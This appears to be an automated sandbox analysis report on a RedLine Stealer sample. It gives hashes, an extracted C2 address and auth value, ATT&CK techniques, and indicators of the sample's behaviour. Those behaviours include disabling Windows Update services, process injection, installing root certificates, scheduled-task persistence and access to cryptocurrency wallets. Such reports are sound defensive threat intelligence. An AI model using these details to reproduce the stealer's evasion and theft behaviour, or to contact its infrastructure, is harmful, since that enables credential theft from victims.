redline | 049726de878da8b7385b3f2a6223902e302ec9fac95d46ab5268bfe1aed094ca

Analysis

max time kernel
162s
max time network
166s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
27-08-2022 20:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

3.0MB
MD5

0730caf5a88ec99420f192f98bfa07d8
SHA1

5830ffc1e922e8a3cd64c5d6593ae2ef33da25a1
SHA256

049726de878da8b7385b3f2a6223902e302ec9fac95d46ab5268bfe1aed094ca
SHA512

bcb82242dd7a8759d247eb3252c60f73f781e4156d77fa2990e43bdbe58af9b7deb2921ea17348dbb60b5940a1a903d34799cc9c622596f0a70d4add2a466e94
SSDEEP

49152:qqZH7ZkIFkIpoCkZVyEwuiRnQ/GRZ9j9EpOExENF/0S4fydRtlyZK4V5UVaVylO:nvk29miaY2pOXMS4fErymKUO

Score

10^/10

redline discovery evasion exploit infostealer spyware

Malware Config

Extracted

Family

redline

185.200.191.18:80

Attributes

auth_value
a11ae941038a2a4398d552996dbd03f1

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/184688-149-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/184688-154-0x000000000041A7DE-mapping.dmp	family_redline
behavioral1/memory/184688-157-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/184688-158-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/184688-191-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1556 created 416 1556 powershell.EXE winlogon.exe
PID 1512 created 416 1512 powershell.EXE winlogon.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

temp.execmd.exeStarter.exe

pid process

1816 temp.exe
1564 cmd.exe
184776 Starter.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

1496 takeown.exe
1492 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 4 IoCs

Processes:

WerFault.exeAppLaunch.exe

pid process

184760 WerFault.exe
184760 WerFault.exe
184760 WerFault.exe
184688 AppLaunch.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

1496 takeown.exe
1492 icacls.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ip-api.com

description	pid	process	target process
PID 1556 created 416	1556	powershell.EXE	winlogon.exe
PID 1512 created 416	1512	powershell.EXE	winlogon.exe

pid	process
1816	temp.exe
1564	cmd.exe
184776	Starter.exe

pid	process
1496	takeown.exe
1492	icacls.exe

pid	process
184760	WerFault.exe
184760	WerFault.exe
184760	WerFault.exe
184688	AppLaunch.exe

pid	process
1496	takeown.exe
1492	icacls.exe

flow	ioc
4	ip-api.com

Drops file in System32 directory 4 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

tmp.execmd.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 1896 set thread context of 1768	1896	tmp.exe	conhost.exe
PID 1564 set thread context of 184688	1564	cmd.exe	AppLaunch.exe
PID 1556 set thread context of 184868	1556	powershell.EXE	dllhost.exe
PID 1512 set thread context of 184908	1512	powershell.EXE	dllhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

tmp.exe

description	ioc	process
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	tmp.exe
File created	C:\Program Files\Google\Chrome\updater.exe	tmp.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1908 sc.exe
1916 sc.exe
764 sc.exe
1824 sc.exe
960 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

184760 1564 WerFault.exe cmd.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1364 schtasks.exe

pid	process
1908	sc.exe
1916	sc.exe
764	sc.exe
1824	sc.exe
960	sc.exe

pid	pid_target	process	target process
184760	1564	WerFault.exe	cmd.exe

pid	process
1364	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 3075471163bad801	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

2008 reg.exe
1928 reg.exe
1444 reg.exe
1844 reg.exe
388 reg.exe
1652 reg.exe
1176 reg.exe
1104 reg.exe
1404 reg.exe

pid	process
2008	reg.exe
1928	reg.exe
1444	reg.exe
1844	reg.exe
388	reg.exe
1652	reg.exe
1176	reg.exe
1104	reg.exe
1404	reg.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

tmp.exetemp.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	tmp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	tmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	temp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	temp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	temp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	temp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	temp.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	temp.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exetmp.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exe

pid	process
1348	powershell.exe
956	powershell.exe
1896	tmp.exe
956	powershell.exe
956	powershell.exe
1512	powershell.EXE
1556	powershell.EXE
1556	powershell.EXE
1512	powershell.EXE
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184908	dllhost.exe
184908	dllhost.exe
184908	dllhost.exe
184908	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe
184868	dllhost.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetmp.exetakeown.exepowershell.exetemp.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exeAppLaunch.exeStarter.exe

description	pid	process
Token: SeDebugPrivilege	1348	powershell.exe
Token: SeShutdownPrivilege	1556	powercfg.exe
Token: SeShutdownPrivilege	1736	powercfg.exe
Token: SeShutdownPrivilege	828	powercfg.exe
Token: SeShutdownPrivilege	1184	powercfg.exe
Token: SeDebugPrivilege	1896	tmp.exe
Token: SeTakeOwnershipPrivilege	1496	takeown.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	1816	temp.exe
Token: SeDebugPrivilege	1512	powershell.EXE
Token: SeDebugPrivilege	1556	powershell.EXE
Token: SeDebugPrivilege	1556	powershell.EXE
Token: SeDebugPrivilege	1512	powershell.EXE
Token: SeDebugPrivilege	184868	dllhost.exe
Token: SeDebugPrivilege	184908	dllhost.exe
Token: SeDebugPrivilege	184688	AppLaunch.exe
Token: SeDebugPrivilege	184776	Starter.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.execmd.execmd.exe

description	pid	process	target process
PID 1896 wrote to memory of 1348	1896	tmp.exe	powershell.exe
PID 1896 wrote to memory of 1348	1896	tmp.exe	powershell.exe
PID 1896 wrote to memory of 1348	1896	tmp.exe	powershell.exe
PID 1896 wrote to memory of 268	1896	tmp.exe	cmd.exe
PID 1896 wrote to memory of 268	1896	tmp.exe	cmd.exe
PID 1896 wrote to memory of 268	1896	tmp.exe	cmd.exe
PID 1896 wrote to memory of 1436	1896	tmp.exe	cmd.exe
PID 1896 wrote to memory of 1436	1896	tmp.exe	cmd.exe
PID 1896 wrote to memory of 1436	1896	tmp.exe	cmd.exe
PID 268 wrote to memory of 1916	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1916	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1916	268	cmd.exe	sc.exe
PID 1436 wrote to memory of 1556	1436	cmd.exe	powercfg.exe
PID 1436 wrote to memory of 1556	1436	cmd.exe	powercfg.exe
PID 1436 wrote to memory of 1556	1436	cmd.exe	powercfg.exe
PID 268 wrote to memory of 764	268	cmd.exe	sc.exe
PID 268 wrote to memory of 764	268	cmd.exe	sc.exe
PID 268 wrote to memory of 764	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1824	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1824	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1824	268	cmd.exe	sc.exe
PID 268 wrote to memory of 960	268	cmd.exe	sc.exe
PID 268 wrote to memory of 960	268	cmd.exe	sc.exe
PID 268 wrote to memory of 960	268	cmd.exe	sc.exe
PID 1436 wrote to memory of 1736	1436	cmd.exe	powercfg.exe
PID 1436 wrote to memory of 1736	1436	cmd.exe	powercfg.exe
PID 1436 wrote to memory of 1736	1436	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1908	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1908	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1908	268	cmd.exe	sc.exe
PID 268 wrote to memory of 388	268	cmd.exe	reg.exe
PID 268 wrote to memory of 388	268	cmd.exe	reg.exe
PID 268 wrote to memory of 388	268	cmd.exe	reg.exe
PID 1436 wrote to memory of 828	1436	cmd.exe	powercfg.exe
PID 1436 wrote to memory of 828	1436	cmd.exe	powercfg.exe
PID 1436 wrote to memory of 828	1436	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1652	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1652	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1652	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1176	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1176	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1176	268	cmd.exe	reg.exe
PID 1436 wrote to memory of 1184	1436	cmd.exe	powercfg.exe
PID 1436 wrote to memory of 1184	1436	cmd.exe	powercfg.exe
PID 1436 wrote to memory of 1184	1436	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1104	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1104	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1104	268	cmd.exe	reg.exe
PID 268 wrote to memory of 2008	268	cmd.exe	reg.exe
PID 268 wrote to memory of 2008	268	cmd.exe	reg.exe
PID 268 wrote to memory of 2008	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1496	268	cmd.exe	takeown.exe
PID 268 wrote to memory of 1496	268	cmd.exe	takeown.exe
PID 268 wrote to memory of 1496	268	cmd.exe	takeown.exe
PID 268 wrote to memory of 1492	268	cmd.exe	icacls.exe
PID 268 wrote to memory of 1492	268	cmd.exe	icacls.exe
PID 268 wrote to memory of 1492	268	cmd.exe	icacls.exe
PID 268 wrote to memory of 1928	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1928	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1928	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1404	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1404	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1404	268	cmd.exe	reg.exe
PID 268 wrote to memory of 1444	268	cmd.exe	reg.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:592

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
3⤵
PID:1416

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

